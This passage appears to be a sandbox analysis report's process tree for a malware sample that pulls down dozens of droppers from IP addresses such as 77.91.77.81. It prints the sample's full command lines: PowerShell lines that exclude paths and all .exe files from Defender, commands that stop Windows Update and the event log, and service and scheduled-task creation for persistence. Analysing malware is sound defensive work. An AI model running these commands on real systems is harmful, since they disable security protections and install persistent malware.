        C:\Windows\SysWOW64\findstr.exe | findstr /I "wrsa.exe opssvc.exe" | PID:7732
        C:\Windows\SysWOW64\tasklist.exe | tasklist | PID:1256
          - Enumerates processes with tasklist
        C:\Windows\SysWOW64\findstr.exe | findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" | PID:5060
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendvictor.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendvictor.exe.exe" | PID:5420
      - Executes dropped EXE
      C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 5420 -s 276 | PID:5728
        - Program crash
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendfile.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendfile.exe.exe" | PID:5792
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" | PID:5888
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend228.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend228.exe.exe" | PID:8
      - Executes dropped EXE
      C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /k move Descriptions Descriptions.cmd & Descriptions.cmd & exit | PID:6124
        C:\Windows\SysWOW64\tasklist.exe | tasklist | PID:5596
          - Enumerates processes with tasklist
        C:\Windows\SysWOW64\findstr.exe | findstr /I "wrsa.exe opssvc.exe" | PID:2344
        C:\Windows\SysWOW64\tasklist.exe | tasklist | PID:1056
          - Enumerates processes with tasklist
        C:\Windows\SysWOW64\findstr.exe | findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" | PID:5980
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendlook.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendlook.exe.exe" | PID:5228
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendlook.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendlook.exe.exe" | PID:5272
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendlook.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendlook.exe.exe" | PID:5256
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendlook.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendlook.exe.exe" | PID:5612
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendw.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendw.exe.exe" | PID:6024
      - Executes dropped EXE
      C:\Users\Admin\AppData\Local\Temp\s.exe | "C:\Users\Admin\AppData\Local\Temp\s.exe" | PID:5252
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    C:\Users\Admin\AppData\Local\Temp\http106.166.173.36imgtest.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http106.166.173.36imgtest.exe.exe" | PID:5284
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      C:\Users\Admin\AppData\Local\Temp\http106.166.173.36imgtest.exe.exe | C:\Users\Admin\AppData\Local\Temp\http106.166.173.36imgtest.exe.exe | PID:3292
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        C:\Windows\system32\whoami.exe | whoami | PID:6576
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendswizzy.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendswizzy.exe.exe" | PID:2468
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" | PID:6024
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendinstaller2.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendinstaller2.exe.exe" | PID:6064
      - Executes dropped EXE
      - Drops file in System32 directory
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious behavior: EnumeratesProcesses
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force | PID:6560
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
      C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart | PID:3880
        C:\Windows\system32\wusa.exe | wusa /uninstall /kb:890830 /quiet /norestart | PID:6756
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop UsoSvc | PID:1948
        - Launches sc.exe
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop WaaSMedicSvc | PID:5000
        - Launches sc.exe
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop wuauserv | PID:5868
        - Launches sc.exe
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop bits | PID:4508
        - Launches sc.exe
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop dosvc | PID:6740
        - Launches sc.exe
        C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:764
      C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 | PID:6964
      C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 | PID:2092
      C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 | PID:2056
      C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 | PID:6112
      C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | PID:588
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe delete "WindowsAutHost" | PID:6224
        - Launches sc.exe
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe create "WindowsAutHost" binpath= "C:\ProgramData\WindowsServices\WindowsAutHost" start= "auto" | PID:5916
        - Launches sc.exe
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop eventlog | PID:6988
        - Launches sc.exe
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe start "WindowsAutHost" | PID:7012
        - Launches sc.exe
        C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:6432
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendfileosn.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendfileosn.exe.exe" | PID:5204
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" | PID:6316
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" | PID:6328
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" | PID:6336
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendfile.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendfile.exe.exe" | PID:6408
      - Executes dropped EXE
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" | PID:372
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendnn.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendnn.exe.exe" | PID:6432
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendnn.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendnn.exe.exe" | PID:6508
        - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendinstaller2.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendinstaller2.exe.exe" | PID:6660
      - Executes dropped EXE
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious behavior: EnumeratesProcesses
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendfileosn.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendfileosn.exe.exe" | PID:6676
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" | PID:7020
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe" | PID:6292
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe" | PID:2284
        - Command and Scripting Interpreter: PowerShell
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe" | PID:1000
        - Command and Scripting Interpreter: PowerShell
      C:\Windows\SysWOW64\schtasks.exe | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DzmQEVPXhX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp565.tmp" | PID:3128
        - Creates scheduled task(s)
      C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe" | PID:8144
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe' | PID:7204
          - Command and Scripting Interpreter: PowerShell
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe' | PID:8028
          - Command and Scripting Interpreter: PowerShell
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\cmd.exe' | PID:6752
          - Command and Scripting Interpreter: PowerShell
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'cmd.exe' | PID:5800
          - Command and Scripting Interpreter: PowerShell
        C:\Windows\SysWOW64\schtasks.exe | "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "cmd" /tr "C:\ProgramData\cmd.exe" | PID:2080
          - Creates scheduled task(s)
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lend1234.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lend1234.exe.exe" | PID:6308
      - Executes dropped EXE
      - Loads dropped DLL
      - Writes to the Master Boot Record (MBR)
      C:\Users\Admin\AppData\Local\Temp\360TS_Setup.exe | "C:\Users\Admin\AppData\Local\Temp\360TS_Setup.exe" /c:WW.Sam.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo= | PID:7924
        C:\Program Files (x86)\1718386031_0\360TS_Setup.exe | "C:\Program Files (x86)\1718386031_0\360TS_Setup.exe" /c:WW.Sam.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall | PID:1560
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendfud.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendfud.exe.exe" | PID:4708
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendfud.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendfud.exe.exe" | PID:6488
        - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendalex.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendalex.exe.exe" | PID:5284
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" | PID:6828
        C:\Users\Admin\AppData\Roaming\configurationValue\One.exe | "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe" | PID:6844
          - Executes dropped EXE
        C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe" | PID:7080
          - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendnn.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendnn.exe.exe" | PID:5836
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendnn.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendnn.exe.exe" | PID:6708
        - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendvictor.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendvictor.exe.exe" | PID:5576
      - Executes dropped EXE
      C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 272 | PID:6836
        - Program crash
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend37.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend37.exe.exe" | PID:5704
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend27.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend27.exe.exe" | PID:3840
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendii.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendii.exe.exe" | PID:5488
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendii.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendii.exe.exe" | PID:6444
        - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendfud.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendfud.exe.exe" | PID:2744
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendfud.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendfud.exe.exe" | PID:5864
        - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendcleaner.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendcleaner.exe.exe" | PID:6112
      - Executes dropped EXE
      C:\Users\Admin\AppData\Roaming\ccleanerfile.exe | "C:\Users\Admin\AppData\Roaming\ccleanerfile.exe" | PID:1256
      C:\Users\Admin\AppData\Roaming\XClient.exe | "C:\Users\Admin\AppData\Roaming\XClient.exe" | PID:6168
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendcleaner.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendcleaner.exe.exe" | PID:764
      - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend1234.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend1234.exe.exe" | PID:6960
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendserver.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendserver.exe.exe" | PID:6732
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendtime2time.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendtime2time.exe.exe" | PID:6268
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendtime2time.exe.exe" -Force
- Command and Scripting Interpreter: PowerShell
PID:6676
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"4⤵PID:6768
-
C:\Users\Admin\Pictures\4a6pJNS6iQXMmgVhNs3Vzr8R.exe"C:\Users\Admin\Pictures\4a6pJNS6iQXMmgVhNs3Vzr8R.exe" /s5⤵PID:3540
-
-
C:\Users\Admin\Pictures\HE3F6e6Fp3FZQu3ThjZgDKrN.exe"C:\Users\Admin\Pictures\HE3F6e6Fp3FZQu3ThjZgDKrN.exe"5⤵PID:5744
-
-
C:\Users\Admin\Pictures\1FcFb1lNRlYY00H2GfBP3BNI.exe"C:\Users\Admin\Pictures\1FcFb1lNRlYY00H2GfBP3BNI.exe"5⤵PID:6256
-
-
C:\Users\Admin\Pictures\kSGEyICwvdcUPzkn7Whqvqpb.exe"C:\Users\Admin\Pictures\kSGEyICwvdcUPzkn7Whqvqpb.exe" /s5⤵PID:6804
-
C:\Users\Admin\Pictures\360TS_Setup.exe"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=6⤵PID:6504
-
C:\Program Files (x86)\1718386342_0\360TS_Setup.exe"C:\Program Files (x86)\1718386342_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall7⤵PID:7800
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendswizzy.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendswizzy.exe.exe"3⤵
- Suspicious use of SetThreadContext
PID:6384 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:5132
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lend27.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lend27.exe.exe"3⤵PID:5880
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendtime2time.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendtime2time.exe.exe"3⤵PID:4844
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendtime2time.exe.exe" -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:5112
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"4⤵PID:4516
-
C:\Users\Admin\Pictures\8ApcCFSDKNJCAdtUjrMMWtgD.exe"C:\Users\Admin\Pictures\8ApcCFSDKNJCAdtUjrMMWtgD.exe" /s5⤵PID:7460
-
-
C:\Users\Admin\Pictures\ax6nFrZReY4gr2sWZzKLDFcw.exe"C:\Users\Admin\Pictures\ax6nFrZReY4gr2sWZzKLDFcw.exe"5⤵PID:2548
-
-
C:\Users\Admin\Pictures\2gbnEHcPp65H5WS0qEOZVug7.exe"C:\Users\Admin\Pictures\2gbnEHcPp65H5WS0qEOZVug7.exe"5⤵PID:2060
-
-
C:\Users\Admin\Pictures\djzptk7h0MJEWC1JJm1FrTc8.exe"C:\Users\Admin\Pictures\djzptk7h0MJEWC1JJm1FrTc8.exe" /s5⤵PID:7660
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"4⤵PID:596
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendIerLRtXpEcMnUjz.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendIerLRtXpEcMnUjz.exe.exe"3⤵PID:6924
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendii.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendii.exe.exe"3⤵
- Suspicious use of SetThreadContext
PID:5436 -
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendii.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendii.exe.exe"4⤵PID:6208
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5336
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"2⤵PID:5824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }2⤵PID:7044
-
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe2⤵PID:2380
-
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5052
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:1380
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5476
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:6444
-
C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"1⤵PID:6984
-
C:\ProgramData\WindowsServices\WindowsAutHostC:\ProgramData\WindowsServices\WindowsAutHost1⤵PID:5648
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:5756
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2808
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:6584
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵PID:5648
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:2940
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:2100
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵PID:8124
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵PID:7912
-
C:\ProgramData\cmd.exeC:\ProgramData\cmd.exe1⤵PID:5300
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\cmd.exe"2⤵
- Command and Scripting Interpreter: PowerShell
PID:7668
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe"2⤵
- Command and Scripting Interpreter: PowerShell
PID:6072
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DzmQEVPXhX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7851.tmp"2⤵
- Creates scheduled task(s)
PID:2988
-
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵PID:3672
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵PID:8080
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵PID:1636
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵PID:2992
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵PID:4368
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵PID:5200
MITRE ATT&CK Enterprise v15 (technique: number of matching signatures)
